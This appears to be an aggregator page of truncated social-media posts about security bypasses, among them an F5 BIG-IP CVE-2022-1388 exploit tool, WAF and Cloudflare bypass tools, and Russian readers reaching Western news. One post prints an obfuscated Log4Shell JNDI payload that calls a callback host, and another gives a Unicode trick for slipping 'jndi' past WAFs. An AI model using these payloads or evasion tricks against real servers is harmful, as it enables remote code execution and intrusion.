I created PoC tool with interactive shell for exploiting #CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in #Rust with #PoC Lab.
Tool ...June 1, 2022
Could hackers bypass your proxy to compromise your web resources? Find out with the new open source tool by @hakluke
https://t.co/v7UVQk8Khc ...May 18, 2022
This week's wrap-up is π₯π₯ with a Spring4Shell RCE, a Cisco RCE, an F5 Big-IP RCE auth bypass, a Powershell Command Adapter & more π€π€
h ...May 13, 2022
Read crowdsource hacker @hakluke documenting Hakoriginfinder, a new tool for bypassing WAFs by discovering the origin host behind a reverse proxy. #WA ...May 9, 2022
F5 Big IP RCE via API exploit
CVE-2022-1388-POC
BIG-IP iCONTROL REST API AUTH BYPASS /RCE EXPLOIT
BIG-IP RCE 2022
DETAILS:
THE iCONTROL REST API Of ...May 5, 2022
Russians bypass website blocks to access Western news sources.
@Cloudflare sees signs of Russians increasingly turning to Western news sources to get ...April 5, 2022
Cloudflare sees signs of Russians increasingly turning to Western news sources to get accurate information about the situation in Ukraine. https://t.c ...April 5, 2022
Russians bypass website blocks to access Western news sources - Cloudflare sees signs of Russians increasingly turning to Western news sources to get ...April 4, 2022
Russians trying to get accurate information about the situation in Ukraine increasingly turning to Western news sources according to Cloudflare...
ht ...April 4, 2022
This week I've had to mitigate a DDoS attack, email spoofing with 100k+ spam emails sent daily and today I woke up to a brute force login attack that ...April 1, 2022
Have you found a Unrestricted file upload but the RCE is not possible due a cloudflare protection? This cloudflare bypass will works for you:
<?p ...March 19, 2022
#Apache #Linux cloudflare argo tunnel -- 2: im looking for a server admin who can create a argo cloudflare tunnel and prevent scanners like shodan / c ...January 27, 2022
Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season ...January 15, 2022
I have created a simple python tool to generate list of log4j payloads which will help you to bypass WAF.
GitHub link : https://t.co/GQl46UW1u6
#py ...December 28, 2021
Tips to bypass a WAF and get RCE with #log4j, if you have a request with a JSON body, replace your "jndi" with \u006a\u006e\u0064\u0069 in this way:
...December 17, 2021
π You can bypass Cloudflare Access in your #cypress tests by creating an interceptor that adds the CF-Access-Client headers from your CA control pa ...December 14, 2021